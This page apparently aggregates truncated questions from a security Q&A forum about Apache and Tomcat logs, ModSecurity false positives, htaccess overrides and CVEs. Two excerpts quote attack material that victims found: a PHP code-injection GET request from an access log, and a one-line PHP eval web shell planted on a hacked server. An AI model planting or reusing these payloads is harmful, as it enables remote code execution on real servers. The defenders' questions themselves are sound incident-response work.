Collaborate Disseminate
I used this command twice in the same day:
grep’21/Aug/2017:’/var/log/apache2/access.log | awk ‘{print $1}’ | sort –
k2nr | uniq -c |wc -l
and first time it returned a number bigger than the second time. And those were not… Continue reading apache access log grew smaller [on hold]
I am tripping mod_security on apache when outlook365 client on a laptop runs autodiscover.. Win10 os. ModSecurity thinks its an SQL injection.. “Detects basic SQL authentication bypass attempts”.
Is there a known issue with… Continue reading outlook client autodiscover SQL Injection
I am tripping mod_security on apache when outlook365 client on a laptop runs autodiscover.. Win10 os. ModSecurity thinks its an SQL injection.. “Detects basic SQL authentication bypass attempts”.
Is there a known issue with… Continue reading outlook client autodiscover SQL Injection
Today we have received following request in the Apache access logs file.
“GET //?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo%20′-%3E%7C’;file_put_contents(dirname($_SERVER%5B’SCRIPT_FILENA… Continue reading Can Hacker Post data through GET request?
I’m facing an unusual situation, I hope you can clarify this for me.
We manage some applications that are accessible through HTTPS requests on port 443 of our server X.
We have a new client that is also supposed to reach us… Continue reading Client requiring our SSL Private Key to configure the Load Balancer that reaches our server. Makes sense?
I have a server that currently has been hacked. Files are being created on my server which has content of this type:
if(isset($_REQUEST[‘oUS’])){/*PJEG*/eval($_REQUEST[‘oUS’]);/*z*/exit;/*Lv*/}
Or like this:
<?ph… Continue reading How can I determine from where injected script came from?
I have received some weird request URL in my TOMCAT access logs. which is as follows:-
\x16\x03\x01\x01\”\x01″ 200 40788
as clearly seen from above log, the server has given 200(success) response to the client(the one who … Continue reading Received weird request URL in my TOMCAT access logs
Is it possible to override parent folder .htaccess rules with child php.ini or some other file except .htaccess?
What I have is:
/var/www/site/static/.htaccess
/var/www/site/static/abc/
/var/www/site/static/abc/def/(I have a… Continue reading Override parent .htaccess with php.ini?
We are using a software suite for automation of FTP traffic. It uses the Apache Mina FtServer component as an embedded FTP server (for FTPS and SFTP).
The use of this library has been flagged as a security concern. The reaso… Continue reading Is it safe to use this embedded ftp server?
We use the OWASP Dependency Check to identify vulnerabilities in the dependencies of our Java project. One that is being flagged is CVE-2012-5786. According to that CVE, the issue is “in Apache CXF, possibly 2.6.0”.
We are u… Continue reading Does CVE-2012-5786 affect Apache CXF 3.1.11 and later?